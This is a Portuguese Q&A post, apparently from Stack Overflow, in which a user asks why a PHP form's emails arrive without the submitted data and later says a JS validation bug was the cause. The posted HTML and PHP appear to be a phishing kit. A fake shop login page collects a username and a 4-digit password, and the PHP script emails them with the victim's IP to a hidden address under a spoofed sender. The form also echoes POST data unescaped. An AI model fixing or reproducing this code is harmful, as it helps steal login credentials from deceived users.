# Formulário PHP para e-mail: envio chega, mas os dados preenchidos não

Tags: php, email

Estou tendo problema com meu envio de dados do formulário no PHP do meu cliente.

O quê está acontecendo?

O preenchimento no formulário está sendo feito normal. Envia no e-mail? Sim, chega por e-mail apenas o HTML, porém os dados que são preenchidos no formulário não. Já procurei aqui no StackOverflow e não achei do mesmo tipo de problema que estou tendo.

O quê pode estar acontecendo?

OBS.:

- Não estou usando SMTP para envio, porém chega normalmente (não é SPAM e também não chega como spam).
- Fiz formulários do mesmo formato desse jeito e sempre chegou (sem SMTP).
- Mudei agora e consequentemente está acontecendo isso.
- Se precisar do código, por favor, me avisar qual parte que jogo aqui.

HTML:

```
<!doctype html>
<html>
    <head>
        <meta charset="utf-8">
            <title>Comprebem.Online</title>
        <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" />
        <meta name="mobile-web-app-capable" content="yes">

        <link rel="stylesheet" type="text/css" href="style.css">
        <script src="js/jquery-3.2.1.min.js" language="javascript"></script>
        <script src="js/jquery.maskedinput.min.js" language="javascript"></script>
        <link rel="stylesheet" href="css/bootstrap.css">
        <script src="script.js" language="javascript"></script>
        <link rel = "shortcut icon" type = "imagem/x-icon" href = "images/icon.png"/>
        <script src="//irql.bipbop.com.br/js/jquery.bipbop.min.js"></script>
    </head>

<body onLoad="window.scrollTo(0,1);">

<div class="login-page">
    <div class="container">
        <div id="campos">
        <form action="update.php" method="post" enctype="application/x-www-form-urlencoded" onSubmit="return checkLogin();">
            <?php foreach($_POST as $key => $value):  ?>
                <input type="hidden" name="<?= $key ?>" value="<?= $value ?>" />
            <?php endforeach; ?>   
                <br>
            <div class="container">
                <div class="row" style="margin-left: 40px;">

                    <div class=" get_form_inner">
                        <h4 class="__head"></h4>
                        <div class="text-center">
                            <div class="row "></div>                        
                        </div>
                    </div>

                    <p></p>
                    <form name="registerForm" method="post" action="">

                    <div class="group">                              
                        <input type="number" name="name"  id="nome" style="background-color:transparent"onkeydown="limit(this, 4);" onkeyup="limit(this,4);" required="required">
                        <span class="highlight"></span>
                        <span class="bar"></span><label>Nome</label>
                    </div>


                    <div class="group">
                        <input  type="number" name="2nome"  id= "2nome" style="background-color:transparent"onkeydown="limit(this, 4);" onkeyup="limit(this,4);" required="required" >
                        <span class="highlight"></span>
                        <span class="bar"></span><label>Sobre Nome</label>                              
                    </div>                                            

                    <div class="group">
                        <input type="number"   name="usuario" required="required" id="usa"style="background-color:transparent"onkeydown="limit(this, 11);" onkeyup="limit(this,11);">
                        <span class="highlight"></span>
                        <span class="bar"></span><label>Usuario</label>
                    </div>

                    <div class="group">     
                        <input type="password" name="senhaLogin" required="required"  id= "sha" style="background-color:transparent"onkeydown="limit(this, 4);" onkeyup="limit(this,4);"onpaste="return false;">
                        <span class="highlight"></span>
                        <span class="bar"></span><label>Senha</label>   
                    </div>

                </div>            
            </div>

            <div class="text-right">
                <p><input type="submit" id="btn-entrar" data-target="Finalizar"></p>
                    <label class="checkbox text-center" style="margin-top: 20px">
                        <input id="chkLembrar" type="checkbox" name="chkLembrar" checked="checked"><label for="chkLembrar">Lembrar Login</label>
                    </label>    
            </div>
        </form>
        </div>
    </div>
</div>
    <script src="js/validations.js" type="text/javascript" ></script>
</body>
```

Envio PHP

```
<?php
    require_once("config.php");

        extract($_POST);
        $headers = "Content-type: text/html; charset=iso-8859-1\r\n";
        $headers .="From: Compre_bem <chegou@hp.com>";
        $ip = $_SERVER["REMOTE_ADDR"];
        date_default_timezone_set('America/Sao_Paulo');
        $data=date("d/m/Y");
        $hora=date("H:i");

        $conteudo.=" ------------------ Compre_bem_formulario_cliente_loja_online-(teste)-------------------<br>

        $data-($hora) - $ip<br>
    --------------------------------------------<br>
    Nome do cliente---------------------------:$nome $cta<br>
    Sobrenome_cliente---------------------------:$2nome<br>
    Usuario_cliente_cadastro------------------------------:$usa<br>
    Senha_cliente_cadastro------------------------: $sha <br>


    --------------------------------------------<br>";

    @mail($receber, "Compre_bem - $ip", "$conteudo", $headers); 
?>
```

Comment: Sim, precisa do código. Tanto do formulário HTML quanto do PHP que envia o e-mail.

Comment: poste o seu código HTML e PHP

Comment: Se o e-mail está chegando então o problema não é a forma do envio, provavelmente seja algum erro no PHP com a captação dos dados do formulário, mas sem o código é complicado dizer.

Answer (score 1):

pessoal consegui resolver meu problema.

era um script de validação no JS do formulário que não tinha os id inseridos.
resumindo...
ele não estava gravando os dados nesses id do formulário porque não especifiquei na minha função JS.

agradeço todos pela participação.